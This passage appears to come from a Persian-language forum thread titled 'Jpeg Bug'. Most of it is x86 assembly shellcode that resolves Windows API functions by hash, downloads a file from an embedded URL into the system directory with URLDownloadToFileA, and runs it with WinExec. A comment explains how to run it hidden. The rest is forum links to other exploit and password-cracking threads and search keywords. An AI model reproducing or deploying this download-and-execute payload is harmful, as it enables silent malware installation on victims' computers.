       mov     ebp, eax                   // ebp = urlmon.dll base address

/*
       push    1
       pop     ecx

   geturlmon:
       call    GetProcAddress_fun
       loop    geturlmon
*/
       call    GetProcAddress_fun

       // url start addr = edi

LGetSystemDirectoryA:
       sub     esp, 0x20
       mov     ebx, esp

       push    0x20
       push    ebx
      call   ADDR_GetSystemDirectoryA     // GetSystemDirectoryA

LURLDownloadToFileA:
       // eax = system path size
       // URLDownloadToFileA url save to a.exe
       mov     dword ptr [ebx+eax], 0x652E555C           // "\U.e"
       mov     dword ptr [ebx+eax+0x4], 0x00006578       // "xe"
       xor     eax, eax
       push    eax
       push    eax
       push    ebx                         // %systemdir%\U.exe
       push    edi                         // url
       push    eax
call    ADDR_URLDownloadToFileA     // URLDownloadToFileA

//LWinExec:
               mov     ebx, esp
               push    1//executes in SW_SHOW, push 0 if you wanna in SW_HIDE..
               push    ebx
               call    ADDR_WinExec                // WinExec(%systemdir%\a.exe);

Finished:
       //push    1
       call    ADDR_ExitProcess            // ExitProcess();

GetProcAddress_fun:
       push    ecx
       push    esi

       mov     esi, [ebp+0x3C]             // e_lfanew
       mov     esi, [esi+ebp+0x78]         // ExportDirectory RVA
       add     esi, ebp                    // rva2va
       push    esi
       mov     esi, [esi+0x20]              // AddressOfNames RVA
       add     esi, ebp                    // rva2va
       xor     ecx, ecx
       dec     ecx

   find_start:
       inc     ecx
       lodsd
       add     eax, ebp
       xor     ebx, ebx

   hash_loop:
       movsx   edx, byte ptr [eax]
       cmp     dl, dh
       jz      short find_addr
       ror     ebx, HASH_KEY               // hash key
       add     ebx, edx
       inc     eax
       jmp     short hash_loop

   find_addr:
       cmp     ebx, [edi]                  // compare to hash
       jnz     short find_start
       pop     esi                         // ExportDirectory
       mov     ebx, [esi+0x24]             // AddressOfNameOrdinals RVA
       add     ebx, ebp                    // rva2va
       mov     cx, [ebx+ecx*2]             // FunctionOrdinal
       mov     ebx, [esi+0x1C]             // AddressOfFunctions RVA
       add     ebx, ebp                    // rva2va
       mov     eax, [ebx+ecx*4]            // FunctionAddress RVA
       add     eax, ebp                    // rva2va
       stosd                               // function address save to [edi]

       pop     esi
       pop     ecx
       ret

sc_end:
       call sc_start

       PROC_END                            //C macro to end proc
   }
}

موضوع: Jpeg Bug

پیوند

ابزارهای موضوع

نمایش

Jpeg Bug

عجب!!

VNCDump

PWDump

Remote Buffer overflow

BIOS password Bypassing

LC1.5 NT Password Cracker

PostgreSQL Remote Reboot

WMF Exploit Generator (This sploit is now full shit, so kiddies party has been star)

کلمات کلیدی در جستجوها:

jpegofdeath v0.5

fehler beim lesen von .jpg not a jpeg file: starts with 0x42 0xda

loopman memcpy

error_insufficient_buffer ollydbg

ollydbg error_insufficient_buffer

nttacplus x84

rails paperclip identify: Not a JPEG file: starts with 0x75 0x30

تابع fflush(stdout) چه کار می کند

برچسب برای این موضوع

مجوز های ارسال و ویرایش